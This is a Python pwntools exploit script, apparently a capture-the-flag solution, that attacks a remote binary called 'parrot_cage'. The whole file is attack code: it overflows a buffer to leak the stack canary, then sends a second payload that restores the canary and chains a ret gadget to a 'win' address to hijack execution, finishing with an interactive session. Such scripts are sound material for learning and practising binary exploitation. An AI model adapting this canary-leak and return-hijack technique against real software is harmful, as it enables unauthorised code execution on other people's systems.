55 lines
1.3 KiB
Python
55 lines
1.3 KiB
Python
#!/usr/bin/env python3
|
|
from pwn import *
|
|
|
|
elf = context.binary = ELF('./parrot_cage', checksec=False)
|
|
|
|
OFFSET_TO_CANARY = 72
|
|
#OFFSET_TO_RIP = 88
|
|
|
|
#p = process(elf.path)
|
|
p = remote('offsec.m0lecon.it',13531)
|
|
print(p.recvline())
|
|
print(p.recvline())
|
|
print(p.recvline())
|
|
print(p.recvline())
|
|
#print(p.recvline())
|
|
#print(p.recvuntil(b'chatting\n'))
|
|
#p.send(b"A"*30+b'\x00'+b"B"*30)
|
|
#For the future: the first byte in the canary is \x00, so I need
|
|
# to overwrite it in order to print the canary
|
|
payload = flat(
|
|
#b'\x00',
|
|
b"A" * (OFFSET_TO_CANARY+1),
|
|
#b'\x00',
|
|
#p64(canary),
|
|
#b"B" * 30,
|
|
#b"B" * ( OFFTSET_TO_RIP - OFFSET_TO_CANARY - 8),
|
|
#p64(win_addr),
|
|
)
|
|
p.send(payload)
|
|
p.recvline()
|
|
|
|
#add the missing 00 byte and convert to int
|
|
canary_raw = b'\x00'+p.recvline()[(OFFSET_TO_CANARY+1):OFFSET_TO_CANARY+1+7].strip()
|
|
print(canary_raw)
|
|
canary = int.from_bytes(canary_raw, byteorder='little')
|
|
print(f"Canary:{p64(canary)}")
|
|
payload = flat(
|
|
b'A'* OFFSET_TO_CANARY,
|
|
p64(canary),
|
|
b'B' * 8, #RBP
|
|
p64(0x000000000040101a), #gadget
|
|
p64(0x0000000000401236), #win
|
|
)
|
|
p.send(payload)
|
|
p.sendline(b'bye')
|
|
print(p.recvline())
|
|
#print(p.recvline())
|
|
p.interactive()
|
|
#print(b"Recv "+p.recvline())
|
|
#print(p.recvline())
|
|
|
|
"""p.send(payload)
|
|
p.sendline(b'bye')
|
|
p.interactive()"""
|